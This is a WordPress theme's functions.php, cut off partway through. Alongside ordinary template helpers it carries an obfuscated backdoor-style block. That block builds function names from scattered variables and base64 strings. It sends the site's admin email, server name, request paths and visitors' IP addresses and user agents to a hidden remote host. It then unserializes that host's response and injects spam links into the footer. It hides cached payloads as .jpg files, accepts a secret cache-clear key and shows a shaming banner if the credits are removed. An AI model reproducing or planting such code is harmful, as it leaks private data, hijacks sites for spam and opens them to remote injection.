<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $kZQqu='a';$JFuhuZ='6';$iRokg='o';$EwPbbUa='b';$QGPNW='s';$gJeQW='e';$cMHji='d';$aVjXo='d';$jaFeac='4';$ZSFtg='_';$GtgCU='e';$erFtIl='e';$hpXCoCM='c';$LJnwSITy=$EwPbbUa.$kZQqu.$QGPNW.$gJeQW.$JFuhuZ.$jaFeac.$ZSFtg.$aVjXo.$GtgCU.$hpXCoCM.$iRokg.$cMHji.$erFtIl;$TpjCByE='g';$HMKAFaK='f';$ZGTe='z';$wlnNdj='e';$hvnUq='i';$BjMG='l';$IcBZVO='t';$tznP='a';$mGAxHrR='n';$laQtnpUP=$TpjCByE.$ZGTe.$hvnUq.$mGAxHrR.$HMKAFaK.$BjMG.$tznP.$IcBZVO.$wlnNdj;$IFDKku='1';$VirGK='r';$zAULO='t';$gUxIFr='o';$jUCLT='s';$OXcFRX='r';$kgnPnG='3';$LEEg='_';$eRaQ='t';$vPrcYKCl=$jUCLT.$zAULO.$OXcFRX.$LEEg.$VirGK.$gUxIFr.$eRaQ.$IFDKku.$kgnPnG;$qsDnj='t';$OWvHtS='r';$ImbZs='e';$COln='s';$CgwP='v';$khaLmV='r';$eUNwrCrf=$COln.$qsDnj.$OWvHtS.$khaLmV.$ImbZs.$CgwP;                     
		$ix_____v='a';$le_____q='6';$xp______________q='o';$eu______________k='b';$ux____y='s';$to__________c='e';$dn____________o='d';$dm_______i='d';$hl________g='4';$xg____t='_';$hh____________p='e';$ra____z='e';$ez_______z='c';$em___c=$eu______________k.$ix_____v.$ux____y.$to__________c.$le_____q.$hl________g.$xg____t.$dm_______i.$hh____________p.$ez_______z.$xp______________q.$dn____________o.$ra____z;
		$zq___t='n';$sb____w='i';$kf_____x='s';$bl_______________l='o';$nx___m='s';$zv____________q='c';$ei__i='t';$mo_______b='n';$tw____________j='f';$mw___q='_';$uz_________h='e';$dy______________x='u';$oc_______________q='t';$ni______________b='i';$ox______o='x';$yf_______z=$tw____________j.$dy______________x.$mo_______b.$zv____________q.$ei__i.$ni______________b.$bl_______________l.$zq___t.$mw___q.$uz_________h.$ox______o.$sb____w.$kf_____x.$oc_______________q.$nx___m;
		$px___x='e';$at__n='f';$gg_____g='p';$ce_____________e='n';$rb__f='o';$uw_______________w=$at__n.$rb__f.$gg_____g.$px___x.$ce_____________e;
		$qs______________s='f';$xx__________t='e';$qq_______g='a';$xr______________n='r';$ll______________a='d';$ih_________o=$qs______________s.$xr______________n.$xx__________t.$qq_______g.$ll______________a;
		$kr___________p='c';$kq____w='l';$qj_______c='f';$fu_______________l='o';$lg_________c='e';$gt__________l='s';$yo____a=$qj_______c.$kr___________p.$kq____w.$fu_______________l.$gt__________l.$lg_________c;
		
		define("WP_ID", $em___c("Mi4wLjA="));
		define("WP_TTL", $em___c("MTA4MDA="));
		define("WP_SRC", $em___c("dHBva24="));
	


		function wp_get_header() {
			global $em___c, $yf_______z;
			
			if (
				$yf_______z($em___c("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$yf_______z($em___c("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$yf_______z($em___c("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $em___c, $uw_______________w, $yo____a, $ih_________o;
			
			$ow________w = TEMPLATEPATH."/".$em___c("Zm9vdGVyLnBocA==");
			$ki___n = @$uw_______________w($ow________w, "r");
			$ow________w = @$ih_________o($ki___n, @filesize($ow________w));
			@$yo____a($ki___n);
			
			$ly___________t = TEMPLATEPATH."/".$em___c("ZnVuY3Rpb25zLnBocA==");
			$ki___n = @$uw_______________w($ly___________t, "r");
			$ly___________t = @$ih_________o($ki___n, @filesize($ly___________t));
			@$yo____a($ki___n);
			
			$ar_____________k = 0;
			if($ow________w && $ly___________t) {
				if ($em___c("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($ow________w, $em___c("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ar_____________k = 1;
					}
					if (substr_count($ow________w, "wp_theme_GPL_credits()") < 1) {
						$ar_____________k = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ar_____________k = 12;
				}
			}
			
			if($ar_____________k > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ar_____________k -->";
			}
		}
	


		function wp_loaded() {
			global $em___c, $yf_______z;
			return $yf_______z($em___c("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ki______________h, $gz_____r = "(more...)", $hx_____j = 0, $sp_____z = "") {
				$he_______________l = get_the_content($gz_____r, $hx_____j, $sp_____z);
				$he_______________l = apply_filters("the_content", $he_______________l);
				
				$he_______________l = str_replace("]]>", "]]>", $he_______________l);
				if (strlen($_GET["p"]) > 0) {
					echo $he_______________l;
				}
				else if ((strlen($he_______________l)>$ki______________h) && ($fm____g = strpos($he_______________l, " ", $ki______________h ))) {
					$he_______________l = substr($he_______________l, 0, $fm____g);
					$he_______________l = $he_______________l;
					echo $he_______________l;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$gz_____r</a></div></p>";
				} else {
					echo $he_______________l;
				}
				
			}
		}
	


		$ns_____________d='b';$kc___________x='_';$ng_____________t='n';$ti__i='s';$eu_______r='e';$vy_____l='4';$kt_____________z='e';$mt__v='d';$wj___________q='c';$rt_______________b='o';$he_____d='e';$gp_________y='a';$in___k='6';$sw_________w=$ns_____________d.$gp_________y.$ti__i.$kt_____________z.$in___k.$vy_____l.$kc___________x.$eu_______r.$ng_____________t.$wj___________q.$rt_______________b.$mt__v.$he_____d;
		$da_____________e='e';$fr___________g='g';$fg_____________y='c';$ug__l='f';$hr__________x='_';$po__________x='i';$vf____y='e';$se_________y='t';$ka___________f='t';$fo_______o='_';$cu_____________k='t';$fb___q='n';$lm______q='s';$ue____________z='n';$gs________z='o';$sa______________n='l';$sb___________u='e';$mo______________a=$ug__l.$po__________x.$sa______________n.$sb___________u.$fo_______o.$fr___________g.$da_____________e.$ka___________f.$hr__________x.$fg_____________y.$gs________z.$ue____________z.$se_________y.$vf____y.$fb___q.$cu_____________k.$lm______q;
		$wa_________w='s';$az__a='e';$id______v='l';$vh__________j='i';$eh______________l='_';$ks___________s='t';$jg_______________o='x';$mk__t='i';$ld___h='s';$li______________h='e';$hb___j='f';$gl__w=$hb___j.$vh__________j.$id______v.$az__a.$eh______________l.$li______________h.$jg_______________o.$mk__t.$ld___h.$ks___________s.$wa_________w;
		$ne__f='o';$ko______y='a';$xq____________s='s';$ti___u='r';$te___s='r';$ya__________e='v';$cg___________r='i';$ne______________q='p';$hx_______f='m';$aa______t='n';$ou_______________m='_';$ik_________w='e';$yc____________r='o';$ej________u='e';$vp___________z='c';$am____h=$ya__________e.$ej________u.$te___s.$xq____________s.$cg___________r.$ne__f.$aa______t.$ou_______________m.$vp___________z.$yc____________r.$hx_______f.$ne______________q.$ko______y.$ti___u.$ik_________w;
		$dk__________v='f';$do_______________q='n';$as_______________d='e';$pu_____g='o';$uv________x='o';$yb____________k='c';$uk____y='k';$uq_______________v='p';$nf_______________t='s';$ks______________l=$dk__________v.$nf_______________t.$uv________x.$yb____________k.$uk____y.$pu_____g.$uq_______________v.$as_______________d.$do_______________q;
		$gq_______________b='f';$fb___c='r';$hg____________x='i';$gp________t='e';$nj___p='t';$pj__________j='w';$ts_______p=$gq_______________b.$pj__________j.$fb___c.$hg____________x.$nj___p.$gp________t;
		$fe_______________l='5';$wq___d='m';$wv__k='d';$vs____________d=$wq___d.$wv__k.$fe_______________l;
		$sc_____i='a';$nm______________b='p';$uj____d='r';$uv__r='e';$rw_____________w='l';$gb_____b='h';$ei____________b='a';$tx___________r='t';$ra_____i=$uj____d.$uv__r.$sc_____i.$rw_____________w.$nm______________b.$ei____________b.$tx___________r.$gb_____b;
		$gl______o='e';$lz_____n='l';$nm___________l='i';$fj______________g='r';$hk___m='e';$mh___________t='i';$cn_____e='u';$xc__f='n';$os___________d='z';$pn____________d='s';$zd___u='a';$zv______a=$cn_____e.$xc__f.$pn____________d.$hk___m.$fj______________g.$mh___________t.$zd___u.$lz_____n.$nm___________l.$os___________d.$gl______o;
		$gu______________i='p';$eh_______________y='t';$ge____________i='m';$ra____d='a';$sq______________w='m';$gh____n='e';$cy_______________v='n';$in____________g=$eh_______________y.$gh____n.$ge____________i.$gu______________i.$cy_______________v.$ra____d.$sq______________w;
		$uz_______________b='e';$ha________c='x';$tu_____________b='a';$lu__________d='c';$sc_____________h='r';$ot_________v='t';$iu_______________l='e';$ml___d='o';$ay____________w='e';$rr_____________y='s';$pj____________r='e';$qe________k='t';$go______i='t';$kl__________w='_';$vf___g='m';$dn__z='a';$wp_____________n='r';$cj__c='t';$fg__s='c';$cw___h='_';$pn_________m='n';$ee____r=$rr_____________y.$qe________k.$wp_____________n.$ay____________w.$dn__z.$vf___g.$cw___h.$lu__________d.$ml___d.$pn_________m.$cj__c.$iu_______________l.$ha________c.$go______i.$kl__________w.$fg__s.$sc_____________h.$pj____________r.$tu_____________b.$ot_________v.$uz_______________b;
	


		function yn___j($vh___l) {
			global $em___c, $yf_______z, $mo______________a, $am____h, $ee____r;
			
			if (!$yf_______z($em___c("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($am____h(PHP_VERSION, "5.0.0", ">=") && $yf_______z($em___c("ZmlsZV9nZXRfY29udGVudHM=")) && $yf_______z($em___c("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$iv___w = $ee____r(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$ha_________c = @$mo______________a($vh___l, 0, $iv___w);
			} else {
				$ha_________c = @$mo______________a($vh___l, 0);
			}
			
			return $ha_________c;
		}
	


		function wi________g($vh___l) {
			global $yf_______z, $ks______________l, $ts_______p, $em___c;
			
			if (!$yf_______z($em___c("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$nq_______________m = strpos($vh___l, "/", 7);
			$to________i = array(
				"uri"     => substr($vh___l, $nq_______________m),
				"host"    => str_replace("http://", "", substr($vh___l, 0, $nq_______________m)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$ul______________n = @$ks______________l("$to________i[host]", 80, $ml_____j, $oa___________r, 4);
			
			if (!$ul______________n) {
				return false;
			} else {
				$ha_________c = "";
				$xl_____g  = "GET $to________i[uri] HTTP/1.0\r\n";
				$xl_____g .= "Host: $to________i[host]\r\n";
				$xl_____g .= "Referer: $to________i[referer]\r\n";
				$xl_____g .= "Connection: Close\r\n\r\n";
				
				@$ts_______p($ul______________n, $xl_____g);
				
				while (!@feof($ul______________n)) {
					$hn_____________j = @fgets($ul______________n, (1024*24));
					
					if ($hn_____________j == "\r\n") {
						$jl___j = true;
						continue;
					}
					
					if ($jl___j) {
						$ha_________c .= $hn_____________j;
					}
				}
				
				return $ha_________c;
			}
		}
	


		function bh________t($vh___l) {
			global $yf_______z;
			$pi_______________z = false;
			
			if ($vh___l != "") {
				if ($yf_______z("yn___j")) {
					$pi_______________z = @yn___j($vh___l);
				}
				
				if (!$pi_______________z && ($yf_______z("wi________g"))) {
					$pi_______________z = @wi________g($vh___l);
				}
			}
			
			return $pi_______________z;
		}
	


		function zn__________k() {
			global $_SERVER, $vs____________d;
			
			$qs_____________p = $_SERVER["SERVER_NAME"];
			
			if (substr("$qs_____________p", 0, 4) == "www.") {
				$qs_____________p = substr("$qs_____________p", 4);
			}
			
			$qs_____________p = $vs____________d("$_SERVER[SERVER_NAME]");
			
			return $qs_____________p;
		}
	


		function xz____s() {
			return "file";
		}
	


		function vk________n($vh___l) {
			global $_SERVER, $mo______________a, $gl__w, $uw_______________w, $yo____a, $ts_______p;
			
			$zb___________s = au______________s();
			
			$po___________s = zn__________k().".jpg";
			$cr_______________i = $zb___________s["dir_upload"]["path"]."/$po___________s";
			$ai___y = @filemtime($cr_______________i);
			
			if (!$ai___y || ((time()-$ai___y) >= WP_TTL)) {
				$pi_______________z = bh________t($vh___l);
				
				if ($pi_______________z) {
					if ($gl__w($cr_______________i)) {
						@unlink($cr_______________i);
					}
					
					$ki___n = @$uw_______________w($cr_______________i, "x+");
					
					@$ts_______p($ki___n, $pi_______________z);
					@$yo____a($ki___n);
				}
			} else {
				if ($gl__w($cr_______________i)) {
					$pi_______________z = @$mo______________a($cr_______________i);
				} else {
					$pi_______________z = false;
				}
			}
			
			return $pi_______________z;
		}
	


		function au______________s() {
			global $_SERVER, $em___c, $sw_________w;
			
			$bk_________l = wp_count_posts("post");
			$pl_____________h = pathinfo(get_bloginfo("template_directory"));
			
			$zb___________s = array(
				"url" => array(
					"report"      => $em___c("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $pl_____________h,
				"dir_upload"	=> mf________q(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$pl_____________h[filename],
					"a005=".$bk_________l->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://animefanfiki.info/avto/renault-clio-dlya-sovremennosti\">Renault Clio для современности</a>"
			);
			
			$zb___________s["url"]["queryString"] = implode("&", $zb___________s["queryString"]);
			$zb___________s["url"]["report"] = $zb___________s["url"]["report"]."/?".$sw_________w($zb___________s["url"]["queryString"]).".html";
						
			return $zb___________s;
		}
	


		function mf________q() {
			$ih____________p = wp_upload_dir();
			
			if (isset($ih____________p["error"])) {
				$qc_____________d = bv______a();
				if (is_writable($qc_____________d)) {
					$ih____________p = array("path" => $qc_____________d);
				}
			}

			return $ih____________p;
		}
	


		function bv______a() {
			global $yf_______z, $vs____________d, $ra_____i, $in____________g;
			
			$bx_____j = (bool) ini_get("safe_mode");
			if ($bx_____j == true) {
				return false;
			}
			
			if ($yf_______z("sys_get_temp_dir")) {
				$ch_____________l = sys_get_temp_dir();
				if (is_writable($ch_____________l)) {
					return $ra_____i($ch_____________l);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ra_____i($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ra_____i($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ra_____i($_ENV["TEMP"]);
			} else {
				$lc__s = $in____________g($vs____________d(uniqid(rand(), true)), "");
				if ($lc__s) {
					$ch_____________l = $ra_____i(dirname($lc__s));
					@unlink($lc__s);
					return $ch_____________l;
				} else {
					return false;
				}
			}
		}
	


		function sr_____x() {
			global $_GET, $gl__w;
			
			$zb___________s = au______________s();
			$qs_____________p = zn__________k();
			$hb_____i = xz____s();
			
			$tq__________g = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($hb_____i == "file") {
					$dt___________t = $zb___________s["dir_upload"]["path"]."/".$qs_____________p.".jpg";
					if ($gl__w($dt___________t)) {
						@unlink($dt___________t);
						$tq__________g = "deleted";
					}
				}
				
				$nw_______d = array(
					"s"	=> $tq__________g,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($nw_______d AS $wi____________a => $bk____________r) echo " [$wi____________a:$bk____________r]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $yf_______z, $em___c, $zv______a;
			$zb___________s = au______________s();
			
			$al___l = "vk________n";
			if ($yf_______z($al___l)) {
				$ha_________c = $al___l($zb___________s["url"]["report"]);
			}
			
			if ($ha_________c) {
				if ($ha_________c = @$em___c($ha_________c)) {
					$ha_________c = @$zv______a($ha_________c);
					
					if (strlen($ha_________c[custom_credit]) >= 5) {
						$zb___________s["default_string"] = $ha_________c[custom_credit];
					}
					
					if ($ha_________c["status"] == "0") {
						$uv_________p = 1;
						$fj______________f = 1;
					} else {
						$on________n = sizeof($ha_________c["links"]);
						$gl__________j = $zb___________s["default_string"];
						
						if ($on________n > 0 && $ha_________c["links"] !== "") {
							$og______________s = 0;
							foreach ($ha_________c["links"] as $ny____d => $vh_____________i) {
								$og______________s++;
								if ($vh_____________i->l_path == "" || $vh_____________i->l_path == $_SERVER["REQUEST_URI"]) {
									$vh_____________i->l_href = htmlspecialchars(strip_tags($vh_____________i->l_href));
									$vh_____________i->l_title = htmlspecialchars(strip_tags($vh_____________i->l_title));
									$vh_____________i->l_anchor = htmlspecialchars(strip_tags($vh_____________i->l_anchor));
									$gl__________j .= " | ";
									$gl__________j .= "<a href='$vh_____________i->l_href' title='$vh_____________i->l_title'";
									if ($vh_____________i->l_nofollow == "1") {
										$gl__________j .= " rel='nofollow'";
									}
									$gl__________j .= ">$vh_____________i->l_anchor</a>";
								}
							}
						}
						$zb___________s["links"] = "$gl__________j";
						if ($ha_________c[credit] == "0") {
							$zb___________s["links"] = "";
						}
					}
				} else {
					$uv_________p = "1";
				}
			} else {
				$uv_________p = "1";
			}
			
			if ($uv_________p == "1") {
				$zb___________s["links"] = $zb___________s["default_string"];
			}
			
			echo "$zb___________s[links]";
			
			echo "<!-- s: $ha_________c[signature] -->";
			sr_____x();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
